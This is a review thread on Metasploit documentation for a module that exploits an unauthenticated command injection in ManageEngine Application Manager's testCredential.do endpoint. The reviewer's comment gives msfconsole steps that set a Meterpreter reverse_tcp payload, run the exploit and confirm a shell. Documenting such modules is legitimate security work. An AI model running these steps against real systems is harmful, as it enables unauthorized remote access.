documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md

```diff
@@ -0,0 +1,46 @@
+## Vulnerable Application
+This module exploits command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.
+
+**Vulnerable Application Installation Steps**
+
+Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else.
+[https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html)
+
+## Verification Steps
```

Comment:
These steps are a lie.

Consider:

```md
1. Start `msfconsole`
2. `use exploit/windows/http/manageengine_appmanager_exec`
3. Set `RHOST <RHOST>`
4. Set `PAYLOAD windows/meterpreter/reverse_tcp`
5. Set `LHOST <LHOST>`
6. Run `check`
7. **Verify** that you are seeing `The target is vulnerable.` in console.
8. Run `exploit`
9. **Verify** that you are seeing `Triggering the vulnerability` in console.
10. **Verify** that you are seeing `Sending stage to <TARGET>` in console.
11. **Verify** that you have your shell.
```

Reply:
Ups sorry. I forgot to update from another module.